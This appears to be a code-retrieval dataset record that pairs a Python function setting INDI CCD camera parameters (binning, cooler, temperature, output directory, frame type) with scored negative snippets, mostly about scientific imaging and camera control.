time_d['lowest'] = 'rl'\n time_d['month'] = 'rm'\n time_d['year'] = 'ry'\n \n for met in metric:\n modisET = ee.ImageCollection('MODIS/006/MOD16A2')\n metL = [met]\n \n def maskbyBits1(img):\n QA = img.select('ET_QC')\n QA1 = getQABits(QA, 0, 0, 'QA')\n QA2 = getQABits(QA, 2, 2, 'QA')\n QA3 = getQABits(QA, 3, 4, 'QA')\n QA4 = getQABits(QA, 5, 7, 'QA')\n mask = QA1.eq(0).And(QA2.eq(0)).And(QA3.eq(0)).And(QA4.lt(4))\n return img.updateMask(mask)\n\n if QC == 'None':\n modisETn = modisET\n elif QC == 'Op1':\n modisETn = modisET.map(maskbyBits1)\n #modify so that divT gets calculated as 8, if date < 12/26\n #and gets a value of either 5 or 6 accordingly if >\n #also update start and end year\n def scale1(img):\n \n daysT = ee.Number(ee.Date(img.date().get('year').format().cat('-12-31')).getRelative('day','year')).add(1)\n divT = daysT.subtract(img.date().getRelative('day','year')).min(8)\n \n return (img.select(metL[0])\n .float()\n .multiply(0.1)\n .divide(divT)\n .copyProperties(img,['system:time_start','system:time_end']))\n \n modisETm = modisETn.map(scale1)\n \n lastImage = ee.Image(ee.ImageCollection('MODIS/006/MOD16A2')\n .sort('system:time_start',False)\n .first())\n lastImageDate = lastImage.get('system:index').getInfo()\n\n firstImage = ee.Image(ee.ImageCollection('MODIS/006/MOD16A2')\n .sort('system:time_start',True)\n .first())\n firstImageDate = firstImage.get('system:index').getInfo()\n\n if all([startYear is None,endYear is None]):\n startYear = int(firstImageDate[0:4])\n endYear = int(lastImageDate[0:4])\n startMonth = int(firstImageDate[5:7])\n endMonth = int(lastImageDate[5:7])-1\n startYearAll = startYear + 1\n endYearAll = endYear - 1\n\n years = 
list(range(startYear, endYearAll + 1))\n monthsEE = ee.List(list(range(startMonth,(12*len(years)+endMonth))))\n yearsEE = ee.List(list(range(startYearAll, endYearAll + 1)))\n \n elif all([startYear >= 0,endYear >= 0]):\n startYearReal = int(firstImageDate[0:4])\n endYearReal = int(lastImageDate[0:4]) \n \n years = list(range(max(startYearReal,startYear), (min(endYearReal,endYear) + 1)))\n \n if endYear >= endYearReal:\n endMonth = int(lastImageDate[5:7])-1\n endYearReal2 = endYearReal-1\n years2 = len(years)-1\n elif endYear < endYearReal:\n endMonth = 0\n endYearReal2 = endYearReal\n years2 = len(years)\n \n if startYear <= startYearReal:\n startMonth = int(firstImageDate[5:7])\n startYearReal2 = startYearReal+1\n elif startYear > startYearReal:\n startMonth = 0\n startYearReal2 = startYearReal\n \n monthsEE = ee.List(list(range(startMonth,(12*years2+endMonth))))\n yearsEE = ee.List(list(range(max(startYearReal2,startYear), (min(endYearReal2,endYear) + 1))))\n\n if timeStep == 'year':\n\n def map_m(i):\n i = ee.Number(i).int()\n image2 = (modisETm\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .first())\n filtered = (modisETm\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col = ee.ImageCollection(yearsEE.map(map_m).flatten())\n\n elif timeStep == 'month':\n \n def map_m(i):\n i = ee.Number(i)\n y = i.divide(12).add(years[0]).int()\n m = i.mod(12).add(1)\n image2 = (modisETm\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .first())\n filtered = (modisETm\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col = ee.ImageCollection(monthsEE.map(map_m).flatten())\n\n elif all([timeStep == 'lowest',endYear is None, startYear is None]):\n\n img_col = modisETm\n \n elif all([timeStep == 'lowest',endYear > 0, startYear > 0]):\n\n img_col = modisETm.filter(ee.Filter.calendarRange(startYear, endYear, 'year'))\n\n #else:\n # print(\"incorrect time step specified\")\n \n if buf > 0:\n bufL = [buf]\n def bufferPoly(feature):\n return feature.buffer(bufL[0])\n\n ptsB = pts1.map(bufferPoly)\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = ptsB.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_ptsB',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('buffered pts by:' + str(buf) + ' for: ' + met)\n\n elif poly > 0:\n \n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n 
description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_poly1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('spatial mean in poly: no buffer for: ' + met)\n\n else:\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_pts1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n #print('value at point: no buffer for: ' + met)", "def testSendVideoProtuneExposure(self):\n self.mgr.sendGoProRequest = Mock()\n self.v.message_factory.gopro_set_request_encode.return_value = 3\n self.mgr.sendGoProCommand(mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE, (1, 0, 0, 0))\n\n self.v.message_factory.gopro_set_request_encode.assert_called_with(0, mavutil.mavlink.MAV_COMP_ID_GIMBAL,\n mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE, (1, 0, 0, 0))\n self.mgr.queueMsg.assert_called_with(3)\n self.mgr.sendGoProRequest.assert_called_with(mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE)", "def capture(self):\n\n self.dpar.n_caps += 1\n self.dpar.caps_saved = False\n self.cap_screen.cap_loaded = True\n tstamp = datetime.now()\n\n self.dpar.cur_cap = self.dpar.n_caps\n self.dpar.iwindow.append(list(self.dpar.iwindow[0])) # deep copy\n self.dpar.frame_timestamp.append(tstamp)\n\n self.cap_scrollbar.setRange(1, self.dpar.n_caps)\n self.cap_scrollbar.setValue(self.dpar.n_caps)\n\n if self.config.sound_on_capture:\n QtMultimedia.QSound.play(CAMERA_CLICK_FILE)\n\n # Always write to file (3/2018)\n \"\"\"\n Write the capture to a file. Create the daily capture directory if not yet created.\n \"\"\"\n\n #im = Image.fromarray(d, mode='F') # float32\n #im.save(\"test2.tiff\", \"TIFF\")\n # https://gist.github.com/ax3l/5781ce80b19d7df3f549#pillow\n\n \"\"\"\n Note that despite lack of documenation, this does save as 16-bit gray-scale image. Open in Photoshop to\n confirm. 
Irfan converts to 8 bpp upon opening ans scales pixels\n \"\"\"\n cfn = self._get_cap_filename()\n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n im = PIL.Image.fromarray((cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n im.save(cfn, 'TIFF')\n\n \"\"\" \n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n cv2.imwrite(cfn, (cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n \"\"\"\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n fn = os.path.basename(cfn)\n\n self.write_to_log('%d\\t%s' % (et, fn))\n\n self.swap_button.setEnabled(True)\n self.update_cap_image()", "def exposuretime(self):\n _, = self.exposuretimes\n return _", "def fetchImgEXP(SYS, DEV):\n SYSDEV = str(SYS) + \"{\" + str(DEV) + \"}\"\n data = caget(SYSDEV + \"image1:ArrayData\")\n rows = caget(SYSDEV + \"image1:ArraySize1_RBV\")\n cols = caget(SYSDEV + \"image1:ArraySize0_RBV\")\n dtype = caget(SYSDEV + \"cam1:DataType_RBV\")\n color = caget(SYSDEV + \"cam1:ColorMode_RBV\")\n count = 0\n img = []\n row = []\n dtype = EPICSTYPE[caget(SYSDEV + \"cam1:DataType_RBV\")]\n #print dtype\n color = caget(SYSDEV + \"cam1:ColorMode_RBV\")\n #print color\n for i in range(rows):\n for j in range(cols):\n row.append(data[count])\n count = count + 1\n r = np.array(row, dtype)\n img.append(r)\n row = []\n npra = np.array(img, dtype)\n #display(npra)\n save(npra, \"fetchImg.jpg\")\n save(npra, \"fetchImg.tiff\") # Might need to change file type\n save(npra, \"fetchImg.jp2\") # Might need to change file type\n save(npra, \"fetchImg.png\") # Might need to change file type\n img = load(\"fetchImg.jpg\") #, getColorFlag(color))\n return img", "def autoExpose(camera,\r\n target_level=245,\r\n adjust_shutter=True,\r\n adjust_gain=True):\r\n\r\n if target_level <= 0 or target_level >= 255:\r\n raise ValueError(\"Target level must be value between in the range\"\r\n \"]0,255[ !\")\r\n\r\n # There must be something to adjust\r\n if ~adjust_shutter and ~adjust_gain:\r\n raise ValueError(\"At one of the variables must be adjustable!\")\r\n\r\n while True:\r\n # Grab frame\r\n image = camera.retrieveBuffer()\r\n image = image.convert(PyCapture2.PIXEL_FORMAT.RAW8)\r\n data = image.getData()\r\n\r\n # Grab current camera properties\r\n shutter = camera.getProperty(PyCapture2.PROPERTY_TYPE.SHUTTER).absValue\r\n gain = camera.getProperty(PyCapture2.PROPERTY_TYPE.GAIN).absValue\r\n\r\n # Exposition adjustment\r\n max_val = np.max(data)\r\n print(\"Shutter = {0:.2f}[ms], Gain = {1:.1f}[db],\"\r\n \"Max pixel value = {2:d} \".format(shutter, gain, max_val),\r\n end='\\r')\r\n\r\n if max_val == max:\r\n if gain == 0 or ~adjust_shutter:\r\n if shutter > 0.1:\r\n shutter = max(0.1, shutter * (1 + _dShutter))\r\n else:\r\n gain = max(0, gain - _dGain)\r\n\r\n elif max_val < min:\r\n if shutter < 8:\r\n shutter = min(8.1, shutter / (1 + _dShutter))\r\n else:\r\n gain += _dGain\r\n else:\r\n break\r\n\r\n # Update camera parameters\r\n if autoExpose:\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.SHUTTER,\r\n autoManualMode=False, absValue=shutter)\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.GAIN,\r\n autoManualMode=False, absValue=gain)", "def capture(camera, image):\n iss.compute() # Get the lat/long values from ephem\n\n # convert the latitude and longitude to EXIF-appropriate representations\n south, exif_latitude = convert(iss.sublat)\n west, exif_longitude = convert(iss.sublong)\n\n # set the EXIF tags specifying the current location\n camera.exif_tags['GPS.GPSLatitude'] 
= exif_latitude\n camera.exif_tags['GPS.GPSLatitudeRef'] = \"S\" if south else \"N\"\n camera.exif_tags['GPS.GPSLongitude'] = exif_longitude\n camera.exif_tags['GPS.GPSLongitudeRef'] = \"W\" if west else \"E\"\n\n # capture the image to disk\n camera.capture(image)", "def expose(self, dark=False, blocking=True):\n with self.lock:\n status = self.status\n if status != READY:\n raise FliError(\"Camera not ready, abort expose command\")\n with self.lock:\n self.dark = dark\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n self.status = EXPOSING\n\n thr = threading.Thread(target=self.exposeHandler)\n thr.start()\n if blocking:\n thr.join()", "def command(mode, ip, log):\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging_config[log])\n\n # Using the default dict to get a valid format string no matter what\n phantom_socket = PhantomSocket(ip)\n phantom_socket.connect()\n click.echo('CONNECTED TO THE PHANTOM CAMERA')\n\n mode_identifier = _modes[mode]\n phantom_socket.set_mode(mode_identifier)\n click.echo('PHANTOM WILL TRANSIT INTO THE MODE \"%s\" NOW!' % mode_identifier)\n click.echo('THIS WILL CAUSE A REBOOT OF THE CAMERA, SO PLEASE HAVE PATIENCE')\n click.echo('IN CASE A CONNECTION CANNOT BE ESTABLISHED EVEN AFTER SOME TIME, HARD RESET THE CAMERA')\n click.echo('AFTER THE HARD RESET, THE MODE SHOULD BE CHANGED')\n phantom_socket.disconnect()", "def locate_camera_frame(self, exp_id, left_cam_id, right_cam_id, frame_id):\n return Response(self.gen_locate_camera_frame(exp_id,\n left_cam_id, right_cam_id,\n frame_id),\n mimetype='multipart/x-mixed-replace; boundary=frame')", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now 
apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def send(self):\n self.spi.send(self.startframe + self.buffer)", "def get_cxi_pattern_eventtime(exp_line, exp_name, user_name, process_stage, run_num):\n # Construct the file address of the corresponding cxi file\n file_name = get_cxi_file_position(exp_line=exp_line,\n exp_name=exp_name,\n process_stage=process_stage,\n user_name=user_name,\n run_num=run_num)\n # Get event index energy\n with h5.File(file_name, 'r') as h5file:\n machinetime = np.array(h5file['/LCLS/machineTime'], dtype=np.int64)\n machinetimenanoseconds = np.array(h5file['/LCLS/machineTimeNanoSeconds'], dtype=np.int64)\n\n return machinetime * (10 ** 9) + machinetimenanoseconds", "def _send(self, frame):\n \n self.device.write(frame)" ]
[ "0.66172343", "0.66024214", "0.61997694", "0.6147396", "0.6001152", "0.5911744", "0.5895627", "0.5890128", "0.5692038", "0.5651894", "0.5623061", "0.56096864", "0.54805845", "0.54146963", "0.5291824", "0.5205684", "0.5177268", "0.51427567", "0.51357037", "0.5105987", "0.5099826", "0.50125957", "0.49856898", "0.49391565", "0.49388713", "0.4927951", "0.49048397", "0.48570973", "0.4849138", "0.48462513", "0.48154885", "0.48036775", "0.47916815", "0.4757237", "0.4718548", "0.46946597", "0.46945262", "0.4690798", "0.46706316", "0.46381631", "0.46298072", "0.45866695", "0.4570952", "0.45507437", "0.45307025", "0.45285425", "0.45227996", "0.45139012", "0.45114103", "0.45050785", "0.4496643", "0.44894615", "0.44887525", "0.4486777", "0.44765708", "0.44618407", "0.443816", "0.44318885", "0.44273552", "0.44111177", "0.44075513", "0.43989918", "0.43939513", "0.43832126", "0.43435743", "0.43361315", "0.43351713", "0.43272412", "0.43158963", "0.4313634", "0.43113545", "0.43113545", "0.4297231", "0.42710093", "0.42659566", "0.4256123", "0.42508098", "0.42454377", "0.42449024", "0.42219236", "0.4220337", "0.42198804", "0.42182425", "0.4212204", "0.42006093", "0.4200132", "0.41995037", "0.4198649", "0.41967866", "0.41951194", "0.41931996", "0.41881016", "0.4180974", "0.41787052", "0.41774154", "0.41538984", "0.41476995", "0.4140007", "0.41386372", "0.41336417" ]
0.7639681
0
Changes CCD parameters/settings based on the given arguments
def setParams(commandList):
    for i in commandList:
        # set the bin mode (1x1 or 2x2)
        if 'bin=' in i:
            try:
                bin = int(i.replace('bin=',''))
                if bin >= 1 and bin <= 2:
                    ccd_bin[0].value = bin
                    ccd_bin[1].value = bin
                    indiclient.sendNewNumber(ccd_bin)
                    response = 'OK: Bin mode set to '+str(bin)+'x'+str(bin)
                else:
                    response = 'BAD: Invalid Bin Mode'
            except ValueError:
                response = 'BAD: Invalid Bin Mode'
        # turn the cooler on/off
        elif 'cooler=' in i:
            cooler = i.replace('cooler=','')
            if cooler.lower() == 'on':
                ccd_cooler[0].s=PyIndi.ISS_ON   # the "COOLER_ON" switch
                ccd_cooler[1].s=PyIndi.ISS_OFF  # the "COOLER_OFF" switch
                indiclient.sendNewSwitch(ccd_cooler)
                response = 'OK: Cooler turned '+cooler
            elif cooler.lower() == 'off':
                ccd_cooler[0].s=PyIndi.ISS_OFF  # the "COOLER_ON" switch
                ccd_cooler[1].s=PyIndi.ISS_ON   # the "COOLER_OFF" switch
                indiclient.sendNewSwitch(ccd_cooler)
                response = 'OK: Cooler turned '+cooler
            else:
                response = 'BAD: Invalid cooler set'
        # set the temperature setpoint (-40C - 0C)
        elif 'temp=' in i:
            try:
                temp = float(i.replace('temp=',''))
                if temp >= -40 and temp <= 0:
                    response = 'OK: Setting temperature setpoint to '+str(temp)
                    ccd_temp[0].value = temp
                    indiclient.sendNewNumber(ccd_temp)
                else:
                    response = 'BAD: Invalid temperature setpoint'
            except ValueError:
                response = 'BAD: Invalid temperature setpoint'
        # set the image output directory
        elif 'fileDir=' in i:
            try:
                global imgNum
                global imgName
                global fileDir
                tempFileDir = i.replace('fileDir=','')
                if tempFileDir[0] == '~':
                    tempFileDir = os.path.expanduser('~')+tempFileDir[1:]
                if tempFileDir[len(tempFileDir)-1] != '/':
                    tempFileDir = tempFileDir+'/'
                if not os.path.exists(tempFileDir):
                    os.makedirs(tempFileDir)
                imgNum, imgName = last_image(tempFileDir)
                fileDir = tempFileDir
                response = 'OK: File directory set to '+fileDir
                #run_image_display(fileDir)
            except FileNotFoundError:
                response = 'BAD: Directory does not exist'
        # set the temperature setpoint (-40C - 0C)
        elif 'frameType=' in i:
            try:
                frameType = i.replace('frameType=','')
                if frameType.lower() == 'light':
                    ccd_frame[0].s = PyIndi.ISS_ON
                    ccd_frame[1].s = PyIndi.ISS_OFF
                    ccd_frame[2].s = PyIndi.ISS_OFF
                    ccd_frame[3].s = PyIndi.ISS_OFF
                    indiclient.sendNewSwitch(ccd_frame)
                    response = 'OK: CCD frame type set to '+frameType
                elif frameType.lower() == 'bias':
                    ccd_frame[0].s = PyIndi.ISS_OFF
                    ccd_frame[1].s = PyIndi.ISS_ON
                    ccd_frame[2].s = PyIndi.ISS_OFF
                    ccd_frame[3].s = PyIndi.ISS_OFF
                    indiclient.sendNewSwitch(ccd_frame)
                    response = 'OK: CCD frame type set to '+frameType
                elif frameType.lower() == 'dark':
                    ccd_frame[0].s = PyIndi.ISS_OFF
                    ccd_frame[1].s = PyIndi.ISS_OFF
                    ccd_frame[2].s = PyIndi.ISS_ON
                    ccd_frame[3].s = PyIndi.ISS_OFF
                    indiclient.sendNewSwitch(ccd_frame)
                    response = 'OK: CCD frame type set to '+frameType
                elif frameType.lower() == 'flat':
                    ccd_frame[0].s = PyIndi.ISS_OFF
                    ccd_frame[1].s = PyIndi.ISS_OFF
                    ccd_frame[2].s = PyIndi.ISS_OFF
                    ccd_frame[3].s = PyIndi.ISS_ON
                    indiclient.sendNewSwitch(ccd_frame)
                    response = 'OK: CCD frame type set to '+frameType
                else:
                    response = 'BAD: Invalid frame type'
            except ValueError:
                response = 'BAD: Invalid frame type'
        else:
            response = 'BAD: Invalid Set'+'\n'+response
    return response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setCcdMode(*argv):", "def set_parameter_values(self, c1, c2):\n self.c1 = c1\n self.c2 = c2", "def set_parameters(self, args):\n self.args = args\n\n if args.testing:\n self.delay_close()\n\n if args.source == \"simulation\":\n log.info(\"Create simulated spectra device\")\n self.dev = simulation.SimulatedSpectraDevice()\n\n elif args.source == \"sled\":\n log.info(\"Create single sled cobra\")\n self.dev = simulation.SimulatedCobraSLED()\n\n elif args.source == \"cobra\":\n log.info(\"Create DALSA cobra device\")\n #self.dev = devices.DalsaCobraDevice()\n self.dev = DALSA.Cobra()\n\n elif args.source == \"opto\":\n log.info(\"Create OPTO sensor cobra device\")\n self.dev = DALSA.OPTOCobra()\n\n elif args.source == \"basler\":\n log.info(\"Create DALSA basler device\")\n #self.dev = devices.DalsaBaslerDevice()\n self.dev = DALSA.BaslerSprint4K()\n\n self.dev.setup_pipe()\n self.setup_pipe_timer()", "def run(fips_dir, proj_dir, args) :\n if len(args) > 0 :\n noun = args[0]\n if noun == 'config' :\n if len(args) > 1 :\n cfg_name = args[1]\n settings.set(proj_dir, 'config', cfg_name)\n else :\n log.error('expected config name')\n elif noun == 'target' :\n if len(args) > 1 :\n target_name = args[1]\n settings.set(proj_dir, 'target', target_name)\n else :\n log.error('expected target name')\n elif noun == 'jobs' :\n if len(args) > 1 :\n num_jobs = args[1]\n if num_jobs.isdigit() :\n settings.set(proj_dir, 'jobs', int(num_jobs))\n else :\n log.error(\"value for setting 'jobs' must be a number\")\n else :\n log.error('expected number of build jobs value')\n elif noun == 'ccache' :\n if len(args) > 1 :\n use_ccache = args[1]\n if use_ccache == 'on' :\n settings.set(proj_dir, 'ccache', True)\n elif use_ccache == 'off' :\n settings.set(proj_dir, 'ccache', False)\n else :\n log.error(\"value for setting 'ccache' must be 'on' or 'off\")\n else :\n log.error(\"invalid noun '{}', must be 'config' or 'target'\".format(noun))\n else :\n log.error(\"expected noun 'config' or 'target'\")", "def _set_command_line_parameters(self,data):\n # This function could be cleaned up.\n\n # for each command line parameter, set it to the value passed in or\n # the default value.\n for p in self._parameter_order:\n if p not in data:\n if p in self._required_parameters: \n raise ApplicationError,\\\n \"Required parameter %s missing.\" % p\n else: data[p] = self._data[p]\n # Write necessary files to disk -- need to modify this so paths\n # to existing files can be passed in.\n if p in self._potential_paths:\n try:\n data[p] = self._input_as_lines(data[p])\n except TypeError:\n pass\n if data['single_pair_only'] == 1 and \\\n not (data['pos1'] and data['pos2']):\n raise ApplicationError,\\\n \"Must specify pos1 and pos2 if single_pair_only == 1.\"\n\n # Make sure the MolType is in the correct format (i.e., 1 or 0)\n data['mol_type'] = mol_type = \\\n self._mol_type_lookup[str(data['mol_type']).lower()]\n\n char_order = self._char_order[mol_type]\n # If we didn't get several values as parameters, set the defaults. 
\n # These are done outside of the above loop b/c they require special \n # handling.\n if not data['char_priors']: \n data['char_priors'] = self._default_priors[mol_type]\n data['char_priors'] = \\\n self._input_as_lines(\\\n self._input_as_gctmpca_char_priors(\\\n data['char_priors'],char_order))\n if not data['sub_matrix']: \n data['sub_matrix'] = \\\n self._input_as_multiline_string(\\\n self._default_sub_matrix[mol_type])\n else:\n data['sub_matrix'] = \\\n self._input_as_lines(\\\n self._input_as_gctmpca_rate_matrix(\\\n data['sub_matrix'],char_order))\n if not data['output_path']: \n data['output_path'] = \\\n self._input_as_path(self.getTmpFilename())\n return data", "def configure(self, args):\n pass", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def do_config(self, args):\n if args.set == \"store_password\":\n put_config_value(\"store_password\", True if args.value.lower() == \"yes\" else False)\n elif args.set == \"password\":\n put_config_value(\"password\", args.value)\n elif args.set == \"username\":\n put_config_value(\"username\", args.value)\n else:\n print(\"Invalid option\")", "def func_update_arguments(self, arg_raw ):\n\n arg_raw.prog = \"DISCASM\"\n arg_raw.description = \"extracts genome-aligned discordant and unmapped reads, and de novo assembles them\"\n\n arg_raw.add_argument(\"--chimeric_junctions\", dest=\"chimeric_junctions\", required=True, help=\"STAR Chimeric.out.junction file\")\n arg_raw.add_argument(\"--aligned_bam\", dest=\"aligned_bam_filename\", required=False, help=\"aligned bam file from your favorite rna-seq alignment tool\")\n arg_raw.add_argument(\"--left_fq\", dest=\"left_fq_filename\", required=True, help=\"left fastq file\")\n arg_raw.add_argument(\"--right_fq\", dest=\"right_fq_filename\", required=True, help=\"right fastq file\")\n arg_raw.add_argument(\"--out_dir\", dest=\"str_out_dir\", required=True, help=\"output directory\")\n arg_raw.add_argument(\"--denovo_assembler\", dest=\"denovo_assembler\", required=True, help=\"de novo assembly method: Trinity|Oases|OasesMultiK\")\n arg_raw.add_argument(\"--add_trinity_params\", dest=\"add_trinity_params\", required=False, help=\"any additional parameters to pass on to Trinity if Trinity is the chosen assembler.\")\n arg_raw.add_argument(\"--normalize_reads\", default=False, action='store_true', help='perform in silico normalization prior to de novo assembly')\n\n return(arg_raw)", "def updateParameters(self, parameters):\r\n\r\n ##if parameters[0].altered:\r\n ## in_nc_file = parameters[0].valueAsText\r\n ##\r\n ## # Set output workspace and default name\r\n ## workspace = os.path.dirname(in_nc_file)\r\n ## parameters[1].value = os.path.join(workspace, in_nc_file + '.prj')\r", "def setSorConstant(*argv):", "def setCmsGenParameters(self, **args):\n self.cmsGenNode.applicationControls.update(args)\n return", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def cmd_config__set(args):\n\n settings = {}\n for pair in args.keyvalues:\n key, value = pair.split(\"=\", 1)\n settings[key] = value\n 
remote.update_config(_get_current_project_name(), settings)", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). '\n 'Process aborted')\n\n self.save_config()", "def update(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def parseArg(self, c):\n\n\t\trocks.app.Application.parseArg(self, c)\n\n\t\tif c[0] in ('--conf', '-c'):\n\t\t\tself.config.setFile(c[1])\n\t\t\tself.config.parse()\n\t\telif c[0] in ('--master',):\n\t\t\tself.masters = [rocks.service411.Master(c[1])]\n\t\telif c[0] in ('--shared',):\n\t\t\tself.shared_filename = c[1]\n\t\telif c[0] in ('--pub',):\n\t\t\tself.pub_filename = c[1]\n\t\telif c[0] == \"--comment\":\n\t\t\tself.comment = c[1]\n\t\telif c[0] == \"--all\":\n\t\t\tself.getall = 1\n\t\telif c[0] in (\"--local\", \"--file\"):\n\t\t\tself.doFile = 1\n\t\telif c[0] in (\"-v\", \"--verbose\"):\n\t\t\tself.verbose += 1", "def setInfo(*args):", "def set_global_attributes(ds):\n ds.title = \"LPDM CO2 Concentration Footprints\"\n ds.summary = (\"Gridded CO2 concentration footprints from the output \"\n \"of the Lagrangian Particle Dispersion 